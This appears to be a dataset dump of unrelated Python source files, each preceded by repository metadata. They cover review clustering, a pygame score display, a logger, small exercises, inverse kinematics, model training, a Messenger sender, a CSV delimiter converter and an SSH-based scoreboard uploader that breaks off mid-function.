                 "other", "some", "such", "no", "nor", "not", "only", "own", "same",
                 "so", "than", "too", "very", "didn", "s", "t", "can", "will", "just",
                 "should", "", "best", "top", "unbelievable", "see", "xa", "br",
                 "ul", "li", ".", "it's", "m", "re", "ve", "d", CHAIN_NAME.lower()}

    def get_most_common_words_per_cluster(cluster_labels, cluster_text, stop_ws=stopwords):
        """Count non-stopword tokens per cluster; return each cluster's top 3."""
        cluster_word_counters = defaultdict(Counter)
        for idx, this_review in enumerate(cluster_text):
            for token in re.findall(r"[\w]+", this_review):
                if token.lower() not in stop_ws:
                    cluster_word_counters[cluster_labels[idx]][token] += 1
        return [word_counter.most_common(3)
                for word_counter in cluster_word_counters.values()]

    pos_most_common = get_most_common_words_per_cluster(pos_clust_labels, pos_clust_text)
    neu_most_common = get_most_common_words_per_cluster(neu_clust_labels, neu_clust_text)
    neg_most_common = get_most_common_words_per_cluster(neg_clust_labels, neg_clust_text)

    def package_for_return(labels, seg_text, rev_text, most_common_words, clust_dist, indices):
        """Build {cluster_id: {'most_common_words': [...],
        'cluster_reviews': [...]}}, listing each review at most once, ordered
        by how close its segment sits to the cluster centroid."""
        cluster_dict = defaultdict(dict)
        full_text = []
        loc_ids = []
        rev_nums = []
        used_reviews = set()
        for i, seg in enumerate(seg_text):
            original_seg_index = indices[i]
            rev_num, loc_idx = seg_map_to_rev_and_loc[original_seg_index]
            full_text.append(rev_text[rev_num])
            loc_ids.append(loc_idx)
            rev_nums.append(rev_num)
        # Sort segments by distance to their centroid, most central first.
        sort_order = np.argsort(np.array(clust_dist))
        sorted_labels = list(np.array(labels)[sort_order])
        sorted_seg_text = list(np.array(seg_text)[sort_order])
        sorted_full_text = list(np.array(full_text)[sort_order])
        sorted_loc_idx = list(np.array(loc_ids)[sort_order])
        sorted_rev_num = list(np.array(rev_nums)[sort_order])
        for idx, word_list in enumerate(most_common_words):
            cluster_dict[idx]['most_common_words'] = word_list
            cluster_dict[idx]['cluster_reviews'] = list()
        for idx, label in enumerate(sorted_labels):
            if sorted_rev_num[idx] not in used_reviews:
                used_reviews.add(sorted_rev_num[idx])
                # Bold the matched segment within the full review text.
                match_string = r'(' + re.escape(sorted_seg_text[idx]) + r')'
                new_text = re.sub(match_string, r'<strong>\1</strong>',
                                  sorted_full_text[idx])
                # NOTE(review): the suffix below was reconstructed from a
                # corrupted string literal -- confirm the exact wording.
                cluster_dict[label]['cluster_reviews'].append(
                    new_text + " - Said about Location #" + str(sorted_loc_idx[idx] + 1))
        return cluster_dict

    pos_clusters = package_for_return(pos_clust_labels, pos_clust_text, rev_text,
                                      pos_most_common, pos_clust_dist, positive_indices)
    neu_clusters = package_for_return(neu_clust_labels, neu_clust_text, rev_text,
                                      neu_most_common, neu_clust_dist, neutral_indices)
    neg_clusters = package_for_return(neg_clust_labels, neg_clust_text, rev_text,
                                      neg_most_common, neg_clust_dist, negative_indices)
    # Rank locations from most positive to least positive cumulative sentiment.
    sentiment_ranked_locations = sorted(loc_dict_cumm_senti.items(),
                                        key=lambda x: -x[1][0])
    return {
        'city_name': CITY_NAME,
        'chain_name': CHAIN_NAME,
        'location_addresses': loc_addresses,
        'location_ranks_and_scores': sentiment_ranked_locations,
        'pos_clusters': pos_clusters,
        'neu_clusters': neu_clusters,
        'neg_clusters': neg_clusters,
    }
| true |
42b15b419190f9a04b6571029058f973040a9075 | Python | Castor87/pacman | /teste_fontes.py | UTF-8 | 967 | 3.0625 | 3 | [] | no_license | import pygame
# Basic RGB colour constants (names are Portuguese: white, black, yellow,
# red, green).
BRANCO = (255, 255, 255)
PRETO = (0, 0, 0)
AMARELO = (255, 255, 0)
VERMELHO = (255, 0, 0)
VERDE = (0, 255, 0)
# Set up an 800x600 window and a bold 24pt font for the score display.
pygame.init()
tela = pygame.display.set_mode((800, 600), 0)
score = 0
fonte = pygame.font.SysFont("calibri", 24, bold=True, italic=False)
# Main loop: redraw the score and frame each iteration, and adjust the score
# with the up/down arrow keys. Escape or closing the window exits.
while True:
    texto = "Score: {}".format(score)
    img_texto = fonte.render(texto, True, BRANCO)
    tela.fill(PRETO)
    tela.blit(img_texto, (168, 433))
    # Outlined panel along the bottom of the window, plus a filled box.
    pygame.draw.rect(tela, BRANCO, (0 + 5, 400, 800 - 10, 200 - 5), 5)
    pygame.draw.rect(tela, BRANCO, (38, 433, 100, 133), 0)
    pygame.display.update()
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            exit()
        if event.type == pygame.KEYUP:
            if event.key == pygame.K_ESCAPE:
                exit()
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_UP:
                score += 10
            if event.key == pygame.K_DOWN:
                score -= 10
| true |
0c73c27ba0d59606669b1bfb6dacd863b5ad3bd6 | Python | daclink/Final_Project_IST338 | /logger.py | UTF-8 | 4,350 | 3.0625 | 3 | [] | no_license | ###
# Drew A. Clinkenbeard
# Error Reporter and Logger
# 29 - April - 2014
# Since I broke this apart into multiple classes
# I needed a more flexible logging system.
###
from time import localtime, strftime
class Logger():
    """Append-only plain-text logger for errors and log messages.

    Output is human-readable so it can be followed live with ``tail -F``.
    Every write opens and closes the file, so no handle is held open
    between calls.
    """

    def __init__(self, fileName="admm.log"):
        """
        Remember the target file and touch it once so permission problems
        surface at construction time.

        Inputs: str fileName the name of the file being written
        Output: creates (or appends to) a file named fileName
        """
        self.fileName = fileName
        try:
            f = open(fileName, 'a')
            f.close()
        except IOError:
            # BUG FIX: the original used a Python-2 print statement and a
            # `finally: f.close()` that raised NameError when open() failed,
            # because `f` was never bound.
            print("Error: Couldn't Open File {0}".format(fileName))

    def __repr__(self):
        return "Writing to file: {0}".format(self.fileName)

    def _err(self, e=False, msg=False, line=False, fileName=False):
        """
        Append a formatted error block to the log file.

        Inputs: Exception e      the exception to report (omitted if falsy)
                str msg          message to include (omitted if falsy)
                int line         line number where the error occurred
                str fileName     file where the error occurred
        Output: writes the error block to self.fileName.
        """
        report = "\n[*** Error ***]\n"
        report += strftime("[%d.%b.%Y %H:%M:%S] ", localtime())
        if fileName:
            # BUG FIX: the original used '==' here -- a no-op comparison --
            # so the file name was silently dropped from the report.
            report += "[File : {0}] \n".format(fileName)
        if line:
            report += "[Line : {0}]\n".format(line)
        if msg:
            report += "[Message: {0} ]\n".format(msg)
        if e:
            # BUG FIX: the original ended with a literal ']n' instead of a
            # newline escape.
            report += "[Error Supplied: {0}]\n".format(e)
        report += "\n*********************************\n"
        # 'with' guarantees the handle is closed even if the write fails.
        with open(self.fileName, 'a') as f:
            f.write(report)

    def _log(self, msg, line=False, level="Low", fileName=False):
        """
        Append a formatted log block to the log file.

        Inputs: str msg          the message to log
                int line         line where the log statement originated
                str level        log level label (informational only)
                str fileName     file where the log statement originated
        Output: writes the log block to self.fileName.
        """
        report = "\n[Log {0}]\n".format(level)
        report += strftime("[%d.%b.%Y %H:%M:%S]\n ", localtime())
        if fileName:
            # BUG FIX: '==' -> '+=' (same no-op comparison as in _err).
            report += "[File : {0}] \n".format(fileName)
        if line:
            report += "[Line : {0}]\n".format(line)
        if msg:
            report += "[Message: {0} ]\n".format(msg)
        report += "\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"
        # BUG FIX: the original left the file handle open (resource leak).
        with open(self.fileName, 'a') as f:
            f.write(report)

    def closeFile(self):
        """
        Kept for backward compatibility: every write now opens and closes
        its own handle, so there is never a persistent file to close.

        Returns True. (The original referenced the undefined name 'true'
        and a never-assigned attribute self.f, so it always printed an
        error and returned False.)
        """
        return True
# class admm_logger(logger):
# def __err__(self,e=False,values=False,line=False):
# stats = "minY %d maxY %d\n" %(self.minY, self.maxY)
# stats += "minX %d maxX %d\n" %(self.minX, self.maxX)
# stats += "len(self.maze) %d len(self.maze[self.minY]) %d" %(len(self.maze) , len(self.maze[self.minY]))
# report = strftime("[%d.%b.%Y %H:%M:%S] ",localtime())
# report += 'KeyError: ['
# report += str(e)
# report += ']\n'
# log.write(report)
# log.write("\n**stats**\n")
# log.write(stats)
# log.write("\n**stats**\n")
# log.write("\n ** report **\n")
# json.dump(values,log)
# log.write("\n ** report **\n")
# def __logger__(self,msg,line="none",level="Low"):
# log.write("=-=-= Log Level: %s =-=-=-=\n" %(level))
# log.write(strftime("[%d.%b.%Y %H:%M:%S] \n ",localtime()))
# log.write("line : \t %s \n" %(str(line)))
# log.write("message: \t")
# log.write(msg)
# log.write("\n=-=-=-=-=-=-=-=-=-=-=-=\n")
| true |
a3a0d613e0bcddc228850c5b9fb383db8f447b87 | Python | ArseniyCool/Python-YandexLyceum2019-2021 | /Основы программирования Python/5. Debugger/Псевдоним-пасьянс.py | UTF-8 | 845 | 3.828125 | 4 | [] | no_license | # По игре Ним-пасьянс с ограничением:
# Nim solitaire with a cap: at most three stones may be taken in one move.
# The player may try to take more than three stones, fewer than one, or more
# than remain in the pile; such moves are simply ignored, and the program
# prints the (unchanged) pile size again only after the next valid move.
stones = int(input('Введите изначальное количество камней в кучке:'))
while stones:
    take = int(input('Введите кол-во камней,которое Вы хотите забрать из кучки:'))
    if 1 <= take <= 3 and take <= stones:
        stones -= take
        print(stones)
| true |
d2d938c136741471f678a2701d513aec58d28ab1 | Python | kajaltingare/Python | /Dictionary/cntWordsIntoDict.py | UTF-8 | 546 | 4.0625 | 4 | [] | no_license | # Write a program to accept a paragraph from user & return a dictionary of count of words in it.
def cntWordsIntoDict(ipString):
    """Count whitespace-separated words in *ipString*.

    Inputs : str ipString  the paragraph to analyse
    Returns: dict          mapping each word to its occurrence count
    """
    opDict = {}
    for word in ipString.split():
        # dict.get with a default replaces the original if/else branching
        # on a `get(...) != None` sentinel check.
        opDict[word] = opDict.get(word, 0) + 1
    return opDict
def main():
    """Read a paragraph from the user and print the per-word counts."""
    # BUG FIX: the original passed the input through eval(), which both
    # forced the user to quote the sentence and executed arbitrary Python
    # expressions typed at the prompt (code injection).
    ipString = input('Enter the sentence to count char in it: ')
    opDict = cntWordsIntoDict(ipString)
    print('Count of words in a paragraph: {0}'.format(opDict))


if __name__ == '__main__':
    main()
| true |
ce24cdf44ebdcfdfe20b72948a311c65993d4dd1 | Python | harry123180/opencv_find_objects | /GMTCV/ik.py | UTF-8 | 494 | 3.0625 | 3 | [] | no_license | import math
# Planar two-link arm geometry: link lengths in the same units as (x, y).
l1 = 4
l2 = 3
pi = 3.14159  # low-precision pi; math.pi would be more accurate
# Sample target pose (not referenced below: ik() is called with literals).
x =-4
y = 0
theta = 90
Kdeg = 180/pi  # radians -> degrees conversion factor (only used in commented-out code)
def ik(x, y, theta, l1=4, l2=3):
    """Inverse kinematics of a planar 2-link arm (elbow solution via acos).

    Inputs:
        x, y   : target position of the end effector
        theta  : target orientation of the end effector, in degrees
        l1, l2 : link lengths (defaults match the module-level arm geometry;
                 generalized from the original's hard-coded globals)
    Returns:
        (d1, d2, d3): shoulder, elbow and wrist joint angles, in radians.
    Raises:
        ValueError when the target lies outside the reachable workspace
        (math.acos receives a value outside [-1, 1]).
    """
    # Law of cosines gives the elbow angle.
    cos_d2 = (x * x + y * y - l1 * l1 - l2 * l2) / (2 * l1 * l2)
    d2 = math.acos(cos_d2)
    # Shoulder angle: target direction minus the elbow's contribution.
    k1 = l1 + l2 * math.cos(d2)
    k2 = l2 * math.sin(d2)
    d1 = math.atan2(y, x) - math.atan2(k2, k1)
    # Wrist angle makes the three joint angles sum to the requested
    # orientation. math.radians replaces the module's low-precision `pi`.
    d3 = math.radians(theta) - d2 - d1
    return d1, d2, d3
# Smoke test: print the joint angles for the sample target (-4, 0), 90 degrees.
print(ik(-4,0,90))
| true |
3ae208a9021a62a1030e67b690c5c7dd8b780803 | Python | JINO-ROHIT/IPL-Score-Prediction | /src/train.py | UTF-8 | 2,271 | 2.53125 | 3 | [] | no_license | from ast import parse
import joblib
import os
import argparse
import config
import model_dispatcher
import pandas as pd
import numpy as np
from sklearn import metrics
from sklearn import ensemble
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
# Load the full training set once at import time (path comes from config.py).
df = pd.read_csv(config.TRAINING_FILE)
#print(df.columns)
def data_encoding(encoding_strategy, encoding_data, encoding_columns):
    """Encode categorical columns of a DataFrame.

    Parameters:
        encoding_strategy: "LabelEncoding" (integer-encode *encoding_columns*
            in place with sklearn's LabelEncoder) or "OneHotEncoding"
            (pd.get_dummies over the whole frame). Any other value returns
            the data unchanged.
        encoding_data: the pandas DataFrame to encode. NOTE: with
            "LabelEncoding" the caller's frame is modified in place.
        encoding_columns: columns to label-encode (ignored for one-hot).

    Returns:
        The encoded DataFrame.
    """
    if encoding_strategy == "LabelEncoding":
        print("LabelEncoding chosen")
        encoder = LabelEncoder()
        for column in encoding_columns:
            print("column", column)
            encoding_data[column] = encoder.fit_transform(tuple(encoding_data[column]))
    elif encoding_strategy == "OneHotEncoding":
        print("OneHotEncoding chosen")
        encoding_data = pd.get_dummies(encoding_data)
    # BUG FIX: the original computed `encoding_data.astype('float64').dtypes`
    # and discarded the result -- a no-op (astype returns a new frame that was
    # never assigned). The dead statement is removed; cast explicitly at the
    # call site if a dtype conversion is actually wanted.
    return encoding_data
# Categorical feature columns to encode.
cat_cols = ['venue','bat_team','bowl_team']
# Available strategies understood by data_encoding(); index 1 = one-hot.
encoding_strategy = ['LabelEncoding','OneHotEncoding']
encoded_df = data_encoding(encoding_strategy[1], df, cat_cols) #ohe for forest based algorithm
# Drop one dummy column per category -- presumably to avoid the dummy-variable
# trap (perfect multicollinearity); TODO confirm that was the intent.
encoded_df = encoded_df.drop(['venue_Barabati Stadium','bat_team_Chennai Super Kings','bowl_team_Chennai Super Kings'],axis =1)
def run(fold,model):
    """Train `model` on all folds except `fold` and validate on `fold`.

    Reads the module-level `encoded_df` (must contain a `kfold` column and
    the target column `total`), prints the fold's RMSE, and persists the
    fitted estimator to config.MODEL_OUTPUT as dt_<fold>.bin.
    """
    # Hold out the rows of the requested fold for validation.
    df_train = encoded_df[encoded_df.kfold != fold].reset_index(drop=True)
    df_valid = encoded_df[encoded_df.kfold == fold].reset_index(drop=True)
    x_train = df_train.drop("total", axis=1).values
    y_train = df_train.total.values
    x_valid = df_valid.drop("total", axis=1).values
    y_valid = df_valid.total.values
    # Look up the estimator by name (see model_dispatcher.models).
    clf = model_dispatcher.models[model]
    clf.fit(x_train, y_train)
    preds = clf.predict(x_valid)
    # Root mean squared error on the held-out fold.
    error = np.sqrt(mean_squared_error(y_valid,preds))
    print(f"Fold = {fold}, error = {error}")
    joblib.dump(clf, os.path.join(config.MODEL_OUTPUT,f"dt_{fold}.bin"))
if __name__ == '__main__':
    # Command-line entry point: train a single fold with the chosen model.
    cli = argparse.ArgumentParser()
    cli.add_argument('--fold', type=int)
    cli.add_argument('--model', type=str)
    arguments = cli.parse_args()
    run(fold=arguments.fold, model=arguments.model)
442ce3c013f419ded55bd05c2a017d9e2088fa1a | Python | Manovah/guvi | /code kata/min_to_hrs.py | UTF-8 | 76 | 3.21875 | 3 | [] | no_license | q=int(input())
# Print a minute count `q` (read from stdin above) as "<hours> <minutes>".
# NOTE: the threshold 59 looks off-by-one, but q == 59 takes the else branch
# and still prints "0 59", so the output is the same as with q < 60.
if q < 59:
    # Under an hour: zero hours, the raw minute count.
    print(0, q)
else:
    hours = q // 60
    minutes = q % 60
    print(hours, minutes)
| true |
7e9ced26af38c3c8e4e10722826244b7d080d330 | Python | QuentinCG/Base-Scripts | /OS_Independent/utils/fb_messenger_send.py | UTF-8 | 4,402 | 2.71875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Utility functions to send message/image with Facebook messenger (can also be called with shell)
"""
__author__ = 'Quentin Comte-Gaz'
__email__ = "quentin@comte-gaz.com"
__license__ = "MIT License"
__copyright__ = "Copyright Quentin Comte-Gaz (2017)"
__python_version__ = "3.+ (SSL not supported correctly with 2.7+)"
__version__ = "1.0 (2017/04/25)"
__status__ = "Usable for any project"
__dependency__ = "fbchat (use 'pip install fbchat' to install package)"
import sys, getopt, logging
import fbchat
from fbchat.models import *
def sendWithFacebookMessenger(email_address, password, receiver_id, message, image_path, debug=True):
  """Send message and or image via Facebook Messenger

  Keyword arguments:
  email_address -- (string) Facebook email address (sender login)
  password -- (string) Facebook password (sender login)
  receiver_id -- (string) ID of the user receiving the message/image
  message -- (string) Message to send (may be empty when sending an image)
  image_path -- (string) Path of the image to send (empty to send text only)
  debug -- (bool, optional) Show debug information
          NOTE(review): this parameter is never read in the body; kept only
          for interface compatibility.

  return: (bool) Image and or message sent
  """
  return_value = False
  # Log in to Facebook Messenger with the sender's credentials
  # (the original comment here incorrectly said "dropbox").
  client = fbchat.Client(email_address, password)
  if message != "" and image_path == "":
    # Text-only message.
    try:
      client.sendMessage(message, thread_id=receiver_id, thread_type=ThreadType.USER)
      return_value = True
    # Deliberate best-effort: any failure simply yields False.
    # TODO: Be more precise in exceptions (but a lot of exceptions can occure with client.send)
    except Exception:
      pass
  elif image_path != "":
    # Image upload, optionally with an accompanying message.
    try:
      client.sendLocalImage(image_path, message=message, thread_id=receiver_id, thread_type=ThreadType.USER)
      return_value = True
    # TODO: Be more precise in exceptions (but a lot of exceptions can occure with client.send)
    except Exception:
      pass
  return return_value
################################# HELP FUNCTION ################################
def __help():
  """Print command-line usage information for this script to stdout."""
  usage_lines = (
    "HELP (-h, --help): Give information to use facebook messenger script",
    "EMAIL (-e, --email): Email (of the sender)",
    "PASSWORD (-p, --password): Password (of the sender)",
    "RECEIVER (-r, --receiver): Receiver ID",
    "MESSAGE (-m, --message): Message to send",
    "IMAGE (-i, --image): Image to send",
  )
  for usage_line in usage_lines:
    print(usage_line)
  print("\n\n")
  print("Example (send image AND message): python fb_messenger_send.py --email \"{email here}\" --password \"{password here}\" --receiver \"{receiver id here}\" --message \"Hello World\" --image \"/tmp/dummy.png\"")
################################# MAIN FUNCTION ###############################
def main():
  """Command-line driver: parse options, then send via Facebook Messenger.

  Exits with status 0 when the message/image was sent, 1 on any error
  (bad options, missing credentials, or a failed send).
  """
  # Set the log level (no log will be shown if "logging.CRITICAL" is used)
  logger = logging.getLogger()
  logger.setLevel(logging.CRITICAL)
  # Have input() function compatible with python 2+ and 3+
  # NOTE(review): the rebound `input` is never used afterwards, so this
  # compatibility shim is dead code.
  try:
    input = raw_input
  except NameError:
    pass
  # Option values, filled in from the command line below.
  _email = ""
  _password = ""
  _receiver = ""
  _message = ""
  _image = ""
  # Get options
  try:
    opts, args = getopt.getopt(sys.argv[1:], "he:p:r:m:i:",
                               ["help", "email=", "password=", "receiver=", "message=", "image="])
  except getopt.GetoptError as err:
    print("[ERROR] "+str(err))
    __help()
    sys.exit(1)
  # Show help (if requested) before validating anything else.
  for o, a in opts:
    if o in ("-h", "--help"):
      __help()
      sys.exit(0)
  # Get base parameters
  for o, a in opts:
    if o in ("-e", "--email"):
      _email = str(a)
      continue
    if o in ("-p", "--password"):
      _password = str(a)
      continue
    if o in ("-r", "--receiver"):
      _receiver = str(a)
      continue
    if o in ("-m", "--message"):
      _message = str(a)
      continue
    if o in ("-i", "--image"):
      _image = str(a)
      continue
  # Validate mandatory parameters.
  if _email == "":
    print("[ERROR] No authentification email specified")
    __help()
    sys.exit(1)
  if _password == "":
    print("[ERROR] No authentification password specified")
    __help()
    sys.exit(1)
  if _receiver == "" or (_message == "" and _image == ""):
    print("[ERROR] No receiver or message/image specified")
    __help()
    sys.exit(1)
  # Perform the send; exit status mirrors the boolean result.
  return_value = sendWithFacebookMessenger(email_address=_email, password=_password, receiver_id=_receiver, message=_message, image_path=_image, debug=True)
  if return_value:
    sys.exit(0)
  sys.exit(1)
# Script entry point: run the command-line utility and exit with its status.
if __name__ == "__main__":
  main()
| true |
67279ec82cf6e2f8b472727cd58f0068a7e852c0 | Python | lancelafontaine/caproomster | /app/core/equipment_test.py | UTF-8 | 499 | 2.625 | 3 | [] | no_license | from app.core.equipment import Equipment
def test_equipment_with_no_arguments_is_zero_length():
    """Equipment created without any item counts should have length zero."""
    empty_set = Equipment("equipmentID_uybino")
    assert len(empty_set) == 0
def test_equipment_getting_number_of_equipment_needed():
    """len(Equipment) equals the total of laptops + projectors + whiteboards."""
    seven_items = Equipment("equipmentID_ibiubi", laptops=2, projectors=1, whiteboards=4)
    assert len(seven_items) == 7
    one_item = Equipment("equipmentID", 0, 1, 0)
    assert len(one_item) == 1
    four_items = Equipment("equipmentID_12313", 1, 2, 1)
    assert len(four_items) == 4
| true |
f5842ab82da63d07d20db85f63ce4c43747fbe09 | Python | ShreeyaVK/Python_scripts | /change_delimiter.py | UTF-8 | 735 | 2.765625 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 23 19:03:55 2017
@author: Sadhna Kathuria
"""
import pandas as pd
# Re-save a comma-delimited dataset as a tab-delimited one, then re-read it
# with pandas to verify the conversion.
path = 'C:/Users/Sadhna Kathuria/Documents/Shreeya_Programming/Predictive/Chapter 2'
filename2 = 'Customer Churn Model.txt'
filename_tab = 'Tab Customer Churn Model.txt'
infile = path + '/' + filename2
outfile = path + '/' + filename_tab
with open(infile) as infile1:
    with open(outfile, 'w') as outfile1:
        for line in infile1:
            fields = line.split(',')
            # BUG FIX: the original joined fields with the literal string
            # '/t'; a tab character is the escape '\t'.
            outfile1.write('\t'.join(fields))
# BUG FIX: the original called pd.read_csv(outfile1) on a handle the inner
# `with` had already closed (ValueError at runtime). Read the written path
# back instead, telling pandas about the new tab delimiter.
data = pd.read_csv(outfile, sep='\t')
# BUG FIX: Python-2 `print data` statement replaced by the print() function.
print(data)
| true |
409e5a90dad58ad4566b493c3838ad081272a27f | Python | uchicago-cs/icpc-tools | /scoreboard-publish/scoreboard-publish.py | UTF-8 | 15,397 | 2.5625 | 3 | [] | no_license | #!/usr/bin/python
# PC^2 scoreboard publishing script
#
# See README for instructions
#
# (c) 2014, Borja Sotomayor
from argparse import ArgumentParser, FileType
from pprint import pprint as pp
from datetime import datetime
import os
import os.path
import stat
import subprocess
import socket
import time
import re
import urllib2
try:
import yaml
import paramiko
except ImportError, ie:
print "Your system is missing a required software library to run this script."
print "Try running the following:"
print
print " pip install --user PyYAML paramiko"
print
exit(1)
# Constants
# To avoid users from shooting themselves in the foot,
# the minimum interval between scoreboard intervals is
# 10 seconds. Change this at your own peril.
MIN_UPDATE_INTERVAL = 10
# When to start warning that the scoreboard will be frozen (minutes before).
FREEZE_WARNING_MINUTES = 10
# Globals
# Set to True by the --verbose command-line flag in the main program.
verbose = False
def log(msg):
    """Print *msg* to stdout prefixed with a local timestamp."""
    print "[%s] %s" % (now_str(), msg)
def vlog(msg):
    """Log *msg* only when the module-level `verbose` flag is set."""
    if verbose:
        log(msg)
def now_str():
    """Current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    timestamp_format = '%Y-%m-%d %H:%M:%S'
    return datetime.now().strftime(timestamp_format)
def td_str(td):
    """Format a datetime.timedelta as 'H hour(s), M minute(s), S second(s)'."""
    total = int(td.total_seconds())
    # '//' keeps the division integral under Python 3 as well (the original
    # relied on Python-2 '/' semantics).
    hours = total // 3600
    total = total % 3600
    minutes = total // 60
    seconds = total % 60
    # BUG FIX: the original said "minutes(s)" and "seconds(s)" -- a double
    # plural -- while correctly writing "hour(s)".
    return "%i hour(s), %i minute(s), %i second(s)" % (hours, minutes, seconds)
def print_http_response(response):
    """Dump status code, headers and body of an HTTP response (debug helper).

    NOTE(review): `response` looks like a requests-style object
    (status_code / headers / text) even though this script itself uses
    urllib2 -- confirm before relying on this helper.
    """
    print "HTTP Status Code: %i" % response.status_code
    print
    print "HTTP Response"
    print "-------------"
    pp(response.headers.items())
    print
    pp(response.text)
def connect_to_server(server, username, path):
    """Open an SSH + SFTP session to *server* and chdir the SFTP client to *path*.

    Connection attempts are retried up to 3 times with exponential backoff
    (5s, 10s, 20s). Any unrecoverable failure logs/prints an error and exits
    the whole process with status 1. Returns (ssh, sftp) on success.
    """
    ntries = 3
    reconnect = 5
    while ntries > 0:
        success = True
        try:
            ssh = paramiko.SSHClient()
            ssh.load_system_host_keys()
            # Auto-accept unknown host keys (trusted network assumed).
            ssh.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
            ssh.connect(hostname=server, username=username)
            sftp = ssh.open_sftp()
        except paramiko.AuthenticationException, ae:
            log("ERROR: Authentication error connection to %s" % server)
            success = False
        except paramiko.SSHException, sshe:
            log("ERROR: SSH error when connecting to %s" % server)
            success = False
        except socket.error:
            log("ERROR: Network error when connecting to %s" % server)
            success = False
        if not success:
            ntries -= 1
            if ntries == 0:
                log("ERROR: Unable to connect to %s. Giving up." % server)
                exit(1)
            log("Trying to reconnect to %s in %i seconds (%i tries left)" % (server, reconnect, ntries))
            time.sleep(reconnect)
            # Exponential backoff between retries.
            reconnect = 2*reconnect
        else:
            break
    # Sanity-check that the remote web directory exists and is readable.
    try:
        stdin, stdout, stderr = ssh.exec_command('stat %s' % path)
        so = stdout.read()
        se = stderr.read()
        if len(se) > 0:
            print "ERROR: Error when trying to read remote web directory %s" % path
            print
            print "stderr: %s" % (se)
            exit(1)
    except paramiko.SSHException, sshe:
        print "ERROR: SSH error when connecting to %s (couldn't stat remote directory)" % server
        exit(1)
    try:
        sftp.chdir(path)
    except IOError, ioe:
        print "ERROR: Could not set SFTP client to directory %s" % path
        exit(1)
    return ssh, sftp
def load_config_file(config):
if type(config) != dict:
print "ERROR: Improperly formatted configuration file (not a YAML object)"
exit(1)
for v in ("pc2_dir", "scoreboard_files", "web_server", "web_username", "web_path"):
if not config.has_key(v):
print "ERROR: Config file missing '%s' value" % v
exit(1)
if not config.has_key("freeze_message"):
config["freeze_message"] = "The scoreboard is frozen."
pc2_dir = config["pc2_dir"]
if not os.path.exists(config["pc2_dir"]):
print "ERROR: Specified pc2_dir (%s) does not exist" % pc2_dir
exit(1)
scoreboard_files = config["scoreboard_files"]
if type(scoreboard_files) != list:
print "ERROR: value of scoreboard_files should be a list of values"
exit(1)
for f in scoreboard_files:
ff = pc2_dir + "/" + f
if not os.path.exists(ff):
print "ERROR: Scoreboard file '%s' does not exist" + ff
exit(1)
ssh_web, sftp_web = connect_to_server(config["web_server"], config["web_username"], config["web_path"])
has_ewteam = True
for v in ("ewteam_server", "ewteam_username", "ewteam_path"):
if not config.has_key(v):
has_ewteam = False
break
if has_ewteam:
if config["ewteam_server"] == config["web_server"]:
ssh_ewteam = ssh_web
sftp_ewteam = ssh_ewteam.open_sftp()
try:
sftp_ewteam.chdir(config["ewteam_path"])
except IOError, ioe:
print "ERROR: Could not set SFTP client to directory %s" % config["ewteam_path"]
exit(1)
else:
ssh_ewteam, sftp_ewteam = connect_to_server(config["ewteam_server"], config["ewteam_username"], config["ewteam_path"])
else:
ssh_ewteam = None
sftp_ewteam = None
return ssh_web, sftp_web, ssh_ewteam, sftp_ewteam
def generate_frozen_file(d, f, freeze_message):
    """Create a '<name>-frozen.html' copy of scoreboard file *f* in directory *d*.

    The freeze banner (freeze_message plus a timestamp) is injected right
    after the <BODY> tag via re.sub. Returns the new file's name (not its
    full path).
    """
    # TODO: Include timezone in message
    frozen_text = "<p style='font: bold 18px Arial, Sans-serif; color: red'>%s</p>\r\n" % freeze_message
    frozen_text += "<p style='font: 12px Arial, Sans-serif'>Scoreboard was frozen at %s</p>" % now_str()
    frozen_scoreboard_file = f.replace(".html", "-frozen.html")
    sbf = open(d + "/" + f)
    sb_src = sbf.read()
    sbf.close()
    # Insert the banner between </BODY-opening tag and the scoreboard table.
    sb_src = re.sub("BODY>\s*<TABLE", "BODY>\r\n%s\r\n<TABLE" % frozen_text, sb_src)
    sbf = open(d + "/" + frozen_scoreboard_file, "w")
    sbf.write(sb_src)
    sbf.close()
    return frozen_scoreboard_file
def upload_scoreboard(sftp_client, files, freeze, freeze_message, suffix, chmod = False):
    """Upload each (directory, filename) pair in *files* through *sftp_client*.

    When *freeze* is true, a '-frozen' copy with the freeze banner is
    generated locally and uploaded instead. When *suffix* is given, the
    remote name becomes '<name>-<suffix>.html'. With *chmod*, uploaded
    files are made world-readable (644).
    """
    for d, f in files:
        if freeze:
            frozen_file = generate_frozen_file(d, f, freeze_message)
            localpath = "%s/%s" % (d,frozen_file)
        else:
            localpath = "%s/%s" % (d,f)
        try:
            if suffix is not None:
                fname = f.replace(".html", "-%s.html" % suffix)
            else:
                fname = f
            sftp_client.put(localpath, fname)
        except Exception, e:
            # NOTE(review): this bare `raise` re-raises immediately, so the
            # error message below is unreachable dead code.
            raise
            print "ERROR: Unable to upload file %s" % fname
        if chmod:
            try:
                # rw-r--r-- so the web server can serve the file.
                sftp_client.chmod(fname, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH)
            except Exception, e:
                print "ERROR: Unable to chmod file %s" % fname
    log("Uploaded scoreboard")
def upload_scoreboard_every(sftp_client, files, suffix, freeze_at, interval):
    """Poll the scoreboard files every *interval* seconds and upload on change.

    Runs forever unless *freeze_at* (a datetime) is given, in which case the
    loop exits once that moment has passed; a warning is logged during the
    last FREEZE_WARNING_MINUTES. Files are chmod'ed only on the first upload.
    """
    # NOTE(review): this reads the module-level `scoreboard_files` (set in
    # the main program) rather than the `files` parameter -- identical at the
    # existing call sites, but the parameter was probably intended.
    last_modified = dict([ ( (d,f), 0.0 ) for (d,f) in scoreboard_files ])
    chmod = True
    while True:
        # Have there been any changes to the scoreboard?
        changed = False
        for ( (d,f), mtime) in last_modified.items():
            new_mtime = os.stat(d+"/"+f).st_mtime
            if new_mtime > mtime:
                changed = True
                last_modified[(d,f)] = new_mtime
        if changed:
            upload_scoreboard(sftp_client = sftp_client,
                              files = files,
                              freeze = False,
                              freeze_message = None,
                              suffix = suffix,
                              chmod = chmod)
            # We only want to chmod the first time we upload
